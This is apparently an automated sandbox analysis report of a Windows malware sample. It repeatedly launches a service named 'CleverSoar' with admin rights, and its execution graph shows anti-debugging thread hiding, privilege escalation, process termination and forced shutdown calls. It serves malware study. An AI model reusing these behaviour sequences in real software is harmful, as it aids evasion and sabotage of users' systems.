                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:81
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:82
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:83
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:84
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:85
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:86
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:87
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:88
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:89
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:90
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:91
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:92
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:93
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:94
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:95
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:96
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:97
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:98
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:99
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:100
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:101
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:102
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:103
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:104
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:105
                              Start time:23:07:11
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:106
                              Start time:23:07:11
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:107
                              Start time:23:07:11
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:108
                              Start time:23:07:11
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true


                                Execution Graph

                                Execution Coverage:1.6%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:15.7%
                                Total number of Nodes:782
                                Total number of Limit Nodes:10
6ce5b907 __dosmaperr 99563->99566 99629 6ce5b9c1 99564->99629 99637 6ce50120 18 API calls __cftoe 99566->99637 99567->99543 99569->99538 99570->99538 99572 6ce5bb78 __wsopen_s 99571->99572 99573 6ce5bbca 99572->99573 99575 6ce5bc33 __dosmaperr 99572->99575 99578 6ce5bb80 __dosmaperr 99572->99578 99582 6ce61990 EnterCriticalSection 99573->99582 99612 6ce50120 18 API calls __cftoe 99575->99612 99576 6ce5bbd0 99580 6ce5bbec __dosmaperr 99576->99580 99583 6ce5bc5e 99576->99583 99578->99548 99611 6ce5bc2b LeaveCriticalSection __wsopen_s 99580->99611 99582->99576 99584 6ce5bc80 99583->99584 99610 6ce5bc9c __dosmaperr 99583->99610 99585 6ce5bcd4 99584->99585 99587 6ce5bc84 __dosmaperr 99584->99587 99586 6ce5bce7 99585->99586 99621 6ce5ac69 20 API calls __wsopen_s 99585->99621 99613 6ce5be40 99586->99613 99620 6ce50120 18 API calls __cftoe 99587->99620 99592 6ce5bcfd 99596 6ce5bd26 99592->99596 99601 6ce5bd01 99592->99601 99593 6ce5bd3c 99594 6ce5bd95 WriteFile 99593->99594 99595 6ce5bd50 99593->99595 99597 6ce5bdb9 GetLastError 99594->99597 99594->99610 99599 6ce5bd85 99595->99599 99600 6ce5bd5b 99595->99600 99623 6ce5beb1 43 API calls 5 library calls 99596->99623 99597->99610 99626 6ce5c2c3 7 API calls 2 library calls 99599->99626 99602 6ce5bd75 99600->99602 99603 6ce5bd60 99600->99603 99601->99610 99622 6ce5c25b 6 API calls __wsopen_s 99601->99622 99625 6ce5c487 8 API calls 3 library calls 99602->99625 99607 6ce5bd65 99603->99607 99603->99610 99606 6ce5bd73 99606->99610 99624 6ce5c39e 7 API calls 2 library calls 99607->99624 99610->99580 99611->99578 99612->99578 99614 6ce619e5 __wsopen_s 18 API calls 99613->99614 99615 6ce5be51 99614->99615 99616 6ce5bcf8 99615->99616 99617 6ce549b2 __Getctype 37 API calls 99615->99617 99616->99592 99616->99593 99618 6ce5be74 99617->99618 99618->99616 99619 6ce5be8e GetConsoleMode 99618->99619 99619->99616 99620->99610 99621->99586 99622->99610 99623->99610 99624->99606 99625->99606 99626->99606 99627->99555 99628->99561 99630 6ce5b9cd 
__wsopen_s 99629->99630 99638 6ce61990 EnterCriticalSection 99630->99638 99632 6ce5b9db 99634 6ce5ba08 99632->99634 99639 6ce5b925 99632->99639 99652 6ce5ba41 LeaveCriticalSection __wsopen_s 99634->99652 99636 6ce5ba2a 99636->99567 99637->99567 99638->99632 99653 6ce615a2 99639->99653 99641 6ce5b93b 99658 6ce6171f SetStdHandle __dosmaperr __wsopen_s 99641->99658 99642 6ce5b935 99642->99641 99644 6ce5b96d 99642->99644 99645 6ce615a2 __wsopen_s 18 API calls 99642->99645 99644->99641 99646 6ce615a2 __wsopen_s 18 API calls 99644->99646 99647 6ce5b964 99645->99647 99648 6ce5b979 CloseHandle 99646->99648 99649 6ce615a2 __wsopen_s 18 API calls 99647->99649 99648->99641 99650 6ce5b985 GetLastError 99648->99650 99649->99644 99650->99641 99651 6ce5b993 __dosmaperr 99651->99634 99652->99636 99655 6ce615af __dosmaperr 99653->99655 99656 6ce615c4 __dosmaperr 99653->99656 99654 6ce615e9 99654->99642 99655->99642 99656->99654 99657 6ce50120 __cftoe 18 API calls 99656->99657 99657->99655 99658->99651 99659->99252 99660->99254 99661->99256 99663 6ce465dc 99662->99663 99664 6ce46608 99662->99664 99678 6ce46601 99663->99678 99685 6cd12250 30 API calls 99663->99685 99670 6ce46619 99664->99670 99683 6cd13560 32 API calls std::_Xinvalid_argument 99664->99683 99667 6ce467e8 99686 6cd12340 24 API calls 99667->99686 99669 6ce467f7 99687 6ce49379 RaiseException 99669->99687 99670->99678 99684 6cd12f60 42 API calls 4 library calls 99670->99684 99674 6ce46827 99689 6cd12340 24 API calls 99674->99689 99676 6ce4683d 99690 6ce49379 RaiseException 99676->99690 99678->99265 99679 6ce46653 99679->99678 99688 6cd12250 30 API calls 99679->99688 99680->99265 99681->99265 99682->99265 99683->99670 99684->99679 99685->99667 99686->99669 99687->99679 99688->99674 99689->99676 99690->99678 99691->99271 99692->99273 99693->99271 99694->99271 99695->99271 99697 6cd1022e 99696->99697 99698 6cd104d6 99697->99698 99703 6ce517db 99697->99703 99698->99283 99700->99285 99701->99287 99702->99289 99704 6ce51806 
99703->99704 99705 6ce517e9 99703->99705 99704->99697 99705->99704 99706 6ce517f6 99705->99706 99707 6ce5180a 99705->99707 99719 6ce50120 18 API calls __cftoe 99706->99719 99711 6ce51a02 99707->99711 99712 6ce51a0e __wsopen_s 99711->99712 99720 6ce4c5a9 EnterCriticalSection 99712->99720 99714 6ce51a1c 99721 6ce519bf 99714->99721 99718 6ce5183c 99718->99697 99719->99704 99720->99714 99729 6ce585a6 99721->99729 99727 6ce519f9 99728 6ce51a51 LeaveCriticalSection 99727->99728 99728->99718 99730 6ce59c60 18 API calls 99729->99730 99731 6ce585b7 99730->99731 99732 6ce619e5 __wsopen_s 18 API calls 99731->99732 99734 6ce585bd __wsopen_s 99732->99734 99733 6ce519d3 99736 6ce5183e 99733->99736 99734->99733 99746 6ce547bb HeapFree GetLastError _free 99734->99746 99738 6ce51850 99736->99738 99740 6ce5186e 99736->99740 99737 6ce5185e 99747 6ce50120 18 API calls __cftoe 99737->99747 99738->99737 99738->99740 99741 6ce51886 _Yarn 99738->99741 99745 6ce58659 62 API calls 99740->99745 99741->99740 99742 6ce50cb9 62 API calls 99741->99742 99743 6ce59c60 18 API calls 99741->99743 99744 6ce5bb6c __wsopen_s 62 API calls 99741->99744 99742->99741 99743->99741 99744->99741 99745->99727 99746->99733 99747->99740 99748->99306 99749->99308 99750->99310 99751->99207 99752->99214 99753->99216 99754->99209 99755->99212 99756 6ce4ef3f 99757 6ce4ef4b __wsopen_s 99756->99757 99758 6ce4ef52 GetLastError ExitThread 99757->99758 99759 6ce4ef5f 99757->99759 99768 6ce549b2 GetLastError 99759->99768 99764 6ce4ef7b 99801 6ce4eeaa 16 API calls 2 library calls 99764->99801 99767 6ce4ef9d 99769 6ce549cf 99768->99769 99770 6ce549c9 99768->99770 99775 6ce549d5 SetLastError 99769->99775 99803 6ce56b62 6 API calls std::_Lockit::_Lockit 99769->99803 99802 6ce56b23 6 API calls std::_Lockit::_Lockit 99770->99802 99773 6ce549ed 99774 6ce549f1 99773->99774 99773->99775 99804 6ce571e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 99774->99804 99781 6ce4ef64 99775->99781 99782 
6ce54a69 99775->99782 99777 6ce549fd 99779 6ce54a05 99777->99779 99780 6ce54a1c 99777->99780 99805 6ce56b62 6 API calls std::_Lockit::_Lockit 99779->99805 99807 6ce56b62 6 API calls std::_Lockit::_Lockit 99780->99807 99795 6ce59d66 99781->99795 99810 6ce50ac9 37 API calls std::locale::_Setgloballocale 99782->99810 99786 6ce54a13 99806 6ce547bb HeapFree GetLastError _free 99786->99806 99788 6ce54a28 99789 6ce54a3d 99788->99789 99790 6ce54a2c 99788->99790 99809 6ce547bb HeapFree GetLastError _free 99789->99809 99808 6ce56b62 6 API calls std::_Lockit::_Lockit 99790->99808 99793 6ce54a19 99793->99775 99796 6ce59d78 GetPEB 99795->99796 99799 6ce4ef6f 99795->99799 99797 6ce59d8b 99796->99797 99796->99799 99811 6ce56e18 5 API calls std::_Lockit::_Lockit 99797->99811 99799->99764 99800 6ce56d6f 5 API calls std::_Lockit::_Lockit 99799->99800 99800->99764 99801->99767 99802->99769 99803->99773 99804->99777 99805->99786 99806->99793 99807->99788 99808->99786 99809->99793 99811->99799 99812 6ccc3d62 99813 6ccc3bc0 99812->99813 99814 6ccc3e8a GetCurrentThread NtSetInformationThread 99813->99814 99815 6ccc3eea 99814->99815 99816 6ccdf8a3 99817 6ccdf887 99816->99817 99818 6cce02ac GetCurrentProcess TerminateProcess 99817->99818 99819 6cce02ca 99818->99819 99820 6ccc4b53 99821 6ce46a43 std::_Facet_Register 4 API calls 99820->99821 99822 6ccc4b5c _Yarn 99821->99822 99823 6ce3aec0 2 API calls 99822->99823 99828 6ccc4bae std::ios_base::_Ios_base_dtor 99823->99828 99824 6cce639e 100011 6ce50130 18 API calls 2 library calls 99824->100011 99826 6ccc4cff 99827 6ccc5164 CreateFileA CloseHandle 99832 6ccc51ec 99827->99832 99828->99824 99828->99826 99828->99827 99829 6ccd245a _Yarn _strlen 99828->99829 99829->99824 99831 6ce3aec0 2 API calls 99829->99831 99847 6ccd2a83 std::ios_base::_Ios_base_dtor 99831->99847 99978 6ce45120 OpenSCManagerA 99832->99978 99834 6cccfc00 100004 6ce45240 CreateToolhelp32Snapshot 99834->100004 99836 6ce46a43 IsProcessorFeaturePresent RaiseException 
EnterCriticalSection LeaveCriticalSection std::_Facet_Register 99873 6ccc5478 std::ios_base::_Ios_base_dtor _Yarn _strlen 99836->99873 99839 6ce3aec0 2 API calls 99839->99873 99840 6ccd37d0 Sleep 99884 6ccd37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 99840->99884 99841 6cce63b2 100012 6ccc15e0 18 API calls std::ios_base::_Ios_base_dtor 99841->100012 99842 6ce45240 4 API calls 99859 6ccd053a 99842->99859 99843 6ce45240 4 API calls 99869 6ccd12e2 99843->99869 99845 6cccffe3 99845->99842 99851 6ccd0abc 99845->99851 99846 6cce64f8 99847->99824 99982 6ce30390 99847->99982 99848 6cce6ba0 104 API calls 99848->99873 99849 6cce6e60 32 API calls 99849->99873 99851->99829 99851->99843 99852 6cce7090 77 API calls 99852->99873 99853 6ce45240 4 API calls 99853->99851 99854 6ce45240 4 API calls 99875 6ccd1dd9 99854->99875 99855 6ccd211c 99855->99829 99857 6ccd241a 99855->99857 99856 6cd0e010 67 API calls 99856->99873 99860 6ce30390 11 API calls 99857->99860 99858 6ce3aec0 2 API calls 99858->99884 99859->99851 99859->99853 99862 6ccd244d 99860->99862 99861 6ccc6722 100001 6ce41880 25 API calls 4 library calls 99861->100001 100010 6ce45d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 99862->100010 99864 6ccd2452 Sleep 99864->99829 99865 6ccc6162 99866 6ccd16ac 99867 6ce44ff0 4 API calls 99877 6ccc775a _strlen 99867->99877 99868 6ccc740b 99868->99867 99869->99854 99869->99855 99869->99866 99870 6ce45240 4 API calls 99870->99855 99871 6cce6ba0 104 API calls 99871->99884 99873->99824 99873->99834 99873->99836 99873->99839 99873->99848 99873->99849 99873->99852 99873->99856 99873->99861 99873->99865 99874 6cce7090 77 API calls 99874->99884 99875->99855 99875->99870 99876 6cd0e010 67 API calls 99876->99884 99877->99824 99878 6ccc7ba9 99877->99878 99879 6ccc7b92 99877->99879 99882 6ccc7b43 _Yarn 99877->99882 99881 6ce46a43 std::_Facet_Register 4 API calls 99878->99881 99880 6ce46a43 std::_Facet_Register 4 API calls 99879->99880 
99880->99882 99881->99882 99883 6ce3aec0 2 API calls 99882->99883 99892 6ccc7be7 std::ios_base::_Ios_base_dtor 99883->99892 99884->99824 99884->99858 99884->99871 99884->99874 99884->99876 99991 6cce6e60 99884->99991 99885 6ce44ff0 4 API calls 99896 6ccc8a07 99885->99896 99886 6ccc9d7f 99889 6ce46a43 std::_Facet_Register 4 API calls 99886->99889 99887 6ccc9d68 99888 6ce46a43 std::_Facet_Register 4 API calls 99887->99888 99890 6ccc9d18 _Yarn 99888->99890 99889->99890 99891 6ce3aec0 2 API calls 99890->99891 99899 6ccc9dbd std::ios_base::_Ios_base_dtor 99891->99899 99892->99824 99892->99885 99893 6ccc962c _strlen 99892->99893 99894 6ccc8387 99892->99894 99893->99824 99893->99886 99893->99887 99893->99890 99895 6ce44ff0 4 API calls 99904 6ccc9120 99895->99904 99896->99895 99897 6ce44ff0 4 API calls 99914 6ccca215 _strlen 99897->99914 99898 6ce44ff0 4 API calls 99900 6ccc9624 99898->99900 99899->99824 99899->99897 99905 6ccce8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 99899->99905 100002 6ce45d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 99900->100002 99901 6ce46a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 99901->99905 99903 6ce3aec0 2 API calls 99903->99905 99904->99898 99905->99824 99905->99901 99905->99903 99906 6cccf7b1 99905->99906 99907 6ccced02 Sleep 99905->99907 100003 6ce45d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 99906->100003 99926 6ccce8c1 99907->99926 99909 6ccce8dd GetCurrentProcess TerminateProcess 99909->99905 99910 6ccca9bb 99913 6ce46a43 std::_Facet_Register 4 API calls 99910->99913 99911 6ccca9a4 99912 6ce46a43 std::_Facet_Register 4 API calls 99911->99912 99921 6ccca953 _Yarn _strlen 99912->99921 99913->99921 99914->99824 99914->99910 99914->99911 99914->99921 99915 6ce44ff0 4 API calls 99915->99926 99916 6cccfbb8 99917 6cccfbe8 ExitWindowsEx Sleep 99916->99917 
99917->99834 99918 6cccf7c0 99918->99916 99919 6cccb009 99923 6ce46a43 std::_Facet_Register 4 API calls 99919->99923 99920 6cccaff0 99922 6ce46a43 std::_Facet_Register 4 API calls 99920->99922 99921->99841 99921->99919 99921->99920 99924 6cccafa0 _Yarn 99921->99924 99922->99924 99923->99924 99925 6ce45960 104 API calls 99924->99925 99927 6cccb059 std::ios_base::_Ios_base_dtor _strlen 99925->99927 99926->99905 99926->99909 99926->99915 99927->99824 99928 6cccb42c 99927->99928 99929 6cccb443 99927->99929 99932 6cccb3da _Yarn _strlen 99927->99932 99930 6ce46a43 std::_Facet_Register 4 API calls 99928->99930 99931 6ce46a43 std::_Facet_Register 4 API calls 99929->99931 99930->99932 99931->99932 99932->99841 99933 6cccb79e 99932->99933 99934 6cccb7b7 99932->99934 99937 6cccb751 _Yarn 99932->99937 99935 6ce46a43 std::_Facet_Register 4 API calls 99933->99935 99936 6ce46a43 std::_Facet_Register 4 API calls 99934->99936 99935->99937 99936->99937 99938 6ce45960 104 API calls 99937->99938 99939 6cccb804 std::ios_base::_Ios_base_dtor _strlen 99938->99939 99939->99824 99940 6cccbc0f 99939->99940 99941 6cccbc26 99939->99941 99944 6cccbbbd _Yarn _strlen 99939->99944 99942 6ce46a43 std::_Facet_Register 4 API calls 99940->99942 99943 6ce46a43 std::_Facet_Register 4 API calls 99941->99943 99942->99944 99943->99944 99944->99841 99945 6cccc08e 99944->99945 99946 6cccc075 99944->99946 99949 6cccc028 _Yarn 99944->99949 99948 6ce46a43 std::_Facet_Register 4 API calls 99945->99948 99947 6ce46a43 std::_Facet_Register 4 API calls 99946->99947 99947->99949 99948->99949 99950 6ce45960 104 API calls 99949->99950 99955 6cccc0db std::ios_base::_Ios_base_dtor _strlen 99950->99955 99951 6cccc7bc 99954 6ce46a43 std::_Facet_Register 4 API calls 99951->99954 99952 6cccc7a5 99953 6ce46a43 std::_Facet_Register 4 API calls 99952->99953 99962 6cccc753 _Yarn _strlen 99953->99962 99954->99962 99955->99824 99955->99951 99955->99952 99955->99962 99956 6cccd3ed 99958 6ce46a43 std::_Facet_Register 4 API calls 
99956->99958 99957 6cccd406 99959 6ce46a43 std::_Facet_Register 4 API calls 99957->99959 99960 6cccd39a _Yarn 99958->99960 99959->99960 99961 6ce45960 104 API calls 99960->99961 99963 6cccd458 std::ios_base::_Ios_base_dtor _strlen 99961->99963 99962->99841 99962->99956 99962->99957 99962->99960 99968 6ccccb2f 99962->99968 99963->99824 99964 6cccd8bb 99963->99964 99965 6cccd8a4 99963->99965 99969 6cccd852 _Yarn _strlen 99963->99969 99967 6ce46a43 std::_Facet_Register 4 API calls 99964->99967 99966 6ce46a43 std::_Facet_Register 4 API calls 99965->99966 99966->99969 99967->99969 99969->99841 99970 6cccdccf 99969->99970 99971 6cccdcb6 99969->99971 99974 6cccdc69 _Yarn 99969->99974 99973 6ce46a43 std::_Facet_Register 4 API calls 99970->99973 99972 6ce46a43 std::_Facet_Register 4 API calls 99971->99972 99972->99974 99973->99974 99975 6ce45960 104 API calls 99974->99975 99977 6cccdd1c std::ios_base::_Ios_base_dtor 99975->99977 99976 6ce44ff0 4 API calls 99976->99905 99977->99824 99977->99976 99980 6ce45156 99978->99980 99979 6ce451e8 OpenServiceA 99979->99980 99980->99979 99981 6ce4522f 99980->99981 99981->99873 99988 6ce303a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 99982->99988 99983 6ce3310e CloseHandle 99983->99988 99984 6ce33f5f CloseHandle 99984->99988 99985 6ce3251b CloseHandle 99985->99988 99986 6ccd37cb 99990 6ce45d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 99986->99990 99987 6ce1c1e0 WriteFile WriteFile WriteFile ReadFile 99987->99988 99988->99983 99988->99984 99988->99985 99988->99986 99988->99987 100013 6ce1b730 99988->100013 99990->99840 99992 6cce6e9f 99991->99992 99995 6cce6eb3 99992->99995 100024 6cd13560 32 API calls std::_Xinvalid_argument 99992->100024 99997 6cce6f5b 99995->99997 100026 6cd12250 30 API calls 99995->100026 100027 6cd126e0 24 API calls 4 library calls 99995->100027 100028 6ce49379 RaiseException 99995->100028 99996 6cce6f6e 99996->99884 99997->99996 100025 6cd137e0 
